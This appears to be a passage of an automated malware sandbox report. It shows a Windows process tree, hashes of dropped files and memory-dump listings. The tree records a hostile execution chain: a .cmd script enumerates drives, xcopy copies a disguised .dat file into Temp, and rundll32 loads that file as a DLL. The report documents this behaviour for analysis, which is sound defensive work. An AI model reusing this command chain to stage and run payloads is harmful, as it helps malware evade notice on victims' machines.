C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6560 /prefetch:83⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ragpewleaK\lawfinledr.cmd A B C D I F G H I J K L M N O P Q R S T U V W X Y Z 0 1 2 3 4 5 6 7 8 91⤵
- Enumerates connected drives
-
C:\Windows\system32\xcopy.exexcopy /s /i /e /h ragpewleaK\overprogramming.dat C:\Users\Admin\AppData\Local\Temp\*2⤵
-
C:\Windows\system32\rundll32.exerundll32 C:\Users\Admin\AppData\Local\Temp\overprogramming.dat,init2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04Filesize
471B
MD574c2edce2571e267077a219dab1c41ed
SHA15cb519ad92a4f7bfbf90385a131a15007731d695
SHA256f724864a8197b2e3fcd1cae479abbc9677499847e62d101e22d68aeecfaa56fb
SHA5128f8a7fc9826dce999e7f816cc57338f5281752ea7bfc9cbd3aafc8c14c97bd95e492dbabec43b037e9fabe0b07d21d4b4c85ea33e5edcb949abc3c69de7e179c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04Filesize
430B
MD55d058912aef0acadd314d24cb4932f77
SHA1a94658cf89acb669cfd4bd65741b164efc33bc43
SHA256cb97ab69af8d444b6ae5ff650691e4a7f9d7fce24d36669c4a3b3de8a11e7650
SHA5123c7e62d0e62eb4fff1357593e3a3c2c798457f74441114b6d99ebdb876b6de81a04138de455a0fd19b39009918b30e85582a351cd523de965510d0dcf66b6116
-
C:\Users\Admin\AppData\Local\Temp\overprogramming.datFilesize
1002KB
MD5d0515acd0a80ad5273ad189e72aca86f
SHA1494b7f00ee4e2a47c3b6e25f7fc603ea9f3ae1d5
SHA256265c1857ac7c20432f36e3967511f1be0b84b1c52e4867889e367c0b5828a844
SHA5122da2dc75b9aca01e0133ad119e194ba52b4f929289b8f23c13da9ef2c9e8c00f5a245b177a22207e168dd7039279357abd7bc13757e982f1088643720749d0aa
-
C:\Users\Admin\AppData\Local\Temp\overprogramming.datFilesize
1002KB
MD5d0515acd0a80ad5273ad189e72aca86f
SHA1494b7f00ee4e2a47c3b6e25f7fc603ea9f3ae1d5
SHA256265c1857ac7c20432f36e3967511f1be0b84b1c52e4867889e367c0b5828a844
SHA5122da2dc75b9aca01e0133ad119e194ba52b4f929289b8f23c13da9ef2c9e8c00f5a245b177a22207e168dd7039279357abd7bc13757e982f1088643720749d0aa
-
\??\pipe\LOCAL\crashpad_1592_ECGIFFKSKWCFAEKNMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/216-147-0x0000000000000000-mapping.dmp
-
memory/1140-177-0x0000000000000000-mapping.dmp
-
memory/1444-132-0x0000000000000000-mapping.dmp
-
memory/1592-155-0x0000000000000000-mapping.dmp
-
memory/1676-172-0x0000000000000000-mapping.dmp
-
memory/1712-175-0x0000000000000000-mapping.dmp
-
memory/1860-174-0x0000000000000000-mapping.dmp
-
memory/1892-159-0x0000000000000000-mapping.dmp
-
memory/1976-166-0x0000000000000000-mapping.dmp
-
memory/2136-156-0x0000000000000000-mapping.dmp
-
memory/2160-150-0x0000000000000000-mapping.dmp
-
memory/2536-162-0x0000000000000000-mapping.dmp
-
memory/2860-168-0x0000000000000000-mapping.dmp
-
memory/2980-196-0x0000000000000000-mapping.dmp
-
memory/3660-153-0x0000000000000000-mapping.dmp
-
memory/3948-170-0x0000000000000000-mapping.dmp
-
memory/4108-142-0x0000000000000000-mapping.dmp
-
memory/4204-137-0x0000000000000000-mapping.dmp
-
memory/4360-164-0x0000000000000000-mapping.dmp
-
memory/4452-176-0x0000000000000000-mapping.dmp
-
memory/4548-158-0x0000000000000000-mapping.dmp
-
memory/5112-134-0x0000000000000000-mapping.dmp
-
memory/5288-185-0x0000000000000000-mapping.dmp
-
memory/5328-178-0x0000000000000000-mapping.dmp
-
memory/5416-186-0x0000000000000000-mapping.dmp
-
memory/5416-189-0x000001AA685C0000-0x000001AA685C9000-memory.dmpFilesize
36KB
-
memory/5652-180-0x0000000000000000-mapping.dmp
-
memory/5668-182-0x0000000000000000-mapping.dmp
-
memory/5860-198-0x0000000000000000-mapping.dmp